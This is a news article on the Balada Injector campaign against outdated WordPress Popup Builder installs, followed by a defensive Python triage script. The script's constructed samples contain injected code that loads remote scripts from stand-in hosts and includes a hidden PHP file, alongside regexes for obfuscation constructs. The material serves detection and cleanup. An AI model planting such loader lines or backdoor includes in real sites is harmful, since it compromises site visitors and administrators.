Recent Balada Injector Malware Infects Over 6,700 Vulnerable WordPress Sites

Researchers at Dr. Web recently uncovered a coordinated attack campaign targeting WordPress websites that run outdated versions of the Popup Builder plugin. The campaign, attributed to the Balada Injector operation, began in mid-December and has so far infected over 6,700 websites.

Further investigation showed that Balada Injector is not a new operation: it has been active since 2017 and has compromised more than 17,000 WordPress sites. The attackers inject a backdoor into compromised sites and use it to redirect visitors to fake technical support pages, bogus lottery sites, and push notification scams.

Latest Campaign

The latest campaign exploits a stored cross-site scripting (XSS) vulnerability, CVE-2023-6000, in Popup Builder versions 4.2.3 and earlier. Popup Builder is a popular plugin, installed on approximately 200,000 sites, used to create customized popups for marketing and informational purposes.

Website security firm Sucuri reported that Balada Injector quickly incorporated an exploit for this vulnerability. The attackers abused the plugin's custom JavaScript feature to attach malicious code to the "sgpbWillOpen" event; because that code is stored in the site's database as part of the popup's configuration, it executes in every visitor's browser whenever the popup opens. As a secondary infection method, the attackers also modified the site's wp-blog-header.php file, which WordPress loads on every page request, to inject the same malicious JavaScript.

The injected script checks the visitor's browser for WordPress administrator cookies. When a logged-in administrator visits, it loads a further set of scripts that run with the administrator's privileges and install the main backdoor, disguised as a plugin file named 'wp-felody.php'. Sucuri researchers noted that the initial injection is never the final step: the attackers consistently follow it by installing this backdoor.

The wp-felody.php backdoor lets the attackers execute arbitrary PHP code, upload and execute files, communicate with their infrastructure, and fetch additional payloads. To date, the number of websites compromised in this wave of the Balada Injector campaign has risen to over 6,700. Sucuri's analysis of the domains used in the attacks shows a pattern in their registration and hosting, including placing them behind Cloudflare, which hides the real origin server and complicates attribution.
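As an added example (not code from Sucuri, Dr. Web or the Popup Builder project), the following Python triage script checks a WordPress install for the artifacts described in the preceding paragraphs: an sgpbWillOpen handler in the database that loads or obfuscates code, a wp-blog-header.php that no longer matches the stock bootstrap file, and a loose PHP file dropped into wp-content/plugins/ such as wp-felody.php. It also reads the Popup Builder version header to tell whether the installed build falls in the affected range. The regexes are my own heuristics rather than published indicators; the dump excerpt, file contents and the stat.example.invalid and cdn.example.invalid hostnames are constructed; and the plugin's main file name (popup-builder.php) is assumed.

```python
"""Triage checks for the Popup Builder / Balada Injector pattern described above.

Added example, not code from Sucuri, Dr. Web or the Popup Builder project. Assumptions:
the database dump is plain SQL text, the regexes are heuristics rather than published
IOCs, and every hostname, file and dump excerpt below is constructed for illustration.
"""
import re

# Heuristic markers of loader/obfuscated JavaScript. SQL dumps escape quotes as \' so an
# optional backslash is tolerated before quote characters.
SUSPICIOUS_JS = re.compile(
    r"eval\s*\(|atob\s*\(|String\.fromCharCode|unescape\s*\(|document\.write\s*\("
    r"|createElement\s*\(\s*\\?['\"]script|\.src\s*=\s*\\?['\"]?https?:",
    re.IGNORECASE,
)
WINDOW = 600  # characters of handler body inspected after each event name


def scan_popup_custom_js(dump_text):
    """Return suspicious sgpbWillOpen handlers found in a database dump.

    Popup Builder keeps per-popup custom JavaScript in the database; a handler bound to
    the sgpbWillOpen event runs in every visitor's browser when the popup opens, which is
    what turned the stored XSS into a site-wide injection point. Handlers without loader
    or obfuscation constructs are not reported.
    """
    starts = [m.start() for m in re.finditer(r"sgpbWillOpen", dump_text)]
    findings = []
    for i, start in enumerate(starts):
        stop = starts[i + 1] if i + 1 < len(starts) else len(dump_text)
        body = dump_text[start:min(start + WINDOW, stop)]
        hit = SUSPICIOUS_JS.search(body)
        if hit:
            findings.append(body[:hit.end() + 60].strip())
    return findings


# Includes a stock wp-blog-header.php (WordPress 5.5+) is expected to contain.
EXPECTED_INCLUDES = {"__DIR__ . '/wp-load.php'", "ABSPATH . WPINC . '/template-loader.php'"}
SUSPICIOUS_PHP = re.compile(
    r"\b(?:eval|base64_decode|gzinflate|str_rot13|file_get_contents|curl_exec|assert)\s*\("
    r"|\$_(?:GET|POST|COOKIE|REQUEST)\b|<script\b",
    re.IGNORECASE,
)


def check_blog_header(php_source):
    """Return reasons a wp-blog-header.php deviates from the stock bootstrap file."""
    reasons = []
    for inc in re.finditer(r"\b(?:require|include)(?:_once)?\s*\(?\s*([^;]+?)\s*\)?\s*;", php_source):
        target = " ".join(inc.group(1).split())
        if target not in EXPECTED_INCLUDES:
            reasons.append(f"unexpected include: {target}")
    reasons += [f"suspicious construct: {h.group(0)}" for h in SUSPICIOUS_PHP.finditer(php_source)]
    return reasons


def popup_builder_is_vulnerable(plugin_main_php):
    """True when the plugin header (popup-builder.php, assumed name) reports 4.2.3 or older."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\d+(?:\.\d+)*)", plugin_main_php, re.MULTILINE)
    if not m:
        raise ValueError("no Version: header found")
    return tuple(int(p) for p in m.group(1).split(".")) <= (4, 2, 3)


def loose_plugin_php_files(plugin_dir_entries):
    """Flag .php files sitting directly in wp-content/plugins/, e.g. a dropped wp-felody.php.

    Real plugins live in their own sub-directory; hello.php and index.php are the stock
    single-file exceptions (assumption: the site has no other single-file plugins).
    """
    return sorted(n for n in plugin_dir_entries
                  if n.endswith(".php") and n not in {"hello.php", "index.php"})


# --- constructed samples, not real captures ---
SAMPLE_DUMP = (
    "...'sgpbWillOpen': function(){ console.log(\\'opened\\'); }...\n"
    "...'sgpbWillOpen': function(){ var s=document.createElement(\\'script\\');"
    "s.src=\\'https://stat.example.invalid/a.js\\';document.head.appendChild(s); }..."
)
STOCK_HEADER = (  # comments of the real file omitted
    "<?php\nif ( ! isset( $wp_did_header ) ) {\n\t$wp_did_header = true;\n"
    "\trequire_once __DIR__ . '/wp-load.php';\n\twp();\n"
    "\trequire_once ABSPATH . WPINC . '/template-loader.php';\n}\n"
)
INJECTED_HEADER = STOCK_HEADER.replace(
    "<?php\n",
    "<?php\n@include_once $_SERVER['DOCUMENT_ROOT'] . '/wp-content/uploads/.x.php';\n"
    "echo '<script src=\"https://cdn.example.invalid/p.js\"></script>';\n",
)
POPUP_BUILDER_MAIN_OLD = "<?php\n/**\n * Plugin Name: Popup Builder\n * Version: 4.2.3\n */\n"

if __name__ == "__main__":
    print("sgpbWillOpen findings:", scan_popup_custom_js(SAMPLE_DUMP))
    print("wp-blog-header.php:", check_blog_header(INJECTED_HEADER) or "clean")
    print("Popup Builder vulnerable:", popup_builder_is_vulnerable(POPUP_BUILDER_MAIN_OLD))
    print("loose plugin files:", loose_plugin_php_files(["popup-builder", "hello.php", "wp-felody.php"]))
```

Run it against a database export and the files under the web root, and treat every hit as a starting point for manual review rather than a verdict: the patterns are heuristics, and updating Popup Builder to a fixed release does not remove a payload that is already stored in the database or a modified core file.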

Security researcher Randy McEoin has identified push notification scams as the primary destination of the redirects in this campaign. Protecting against Balada Injector attacks requires WordPress site administrators to update their themes and plugins to the latest versions and to uninstall any unsupported or unnecessary products. On a site that was already running an affected Popup Builder build, the update is only the first step: the JavaScript stored in the database, any modified core files such as wp-blog-header.php, and any dropped backdoor files remain in place after the plugin is patched and must be removed separately.

By minimizing the number of active plugins on a WordPress site, admins shrink the attack surface and reduce the risk of breaches by automated exploitation scripts, which scan for known vulnerable plugin versions at scale.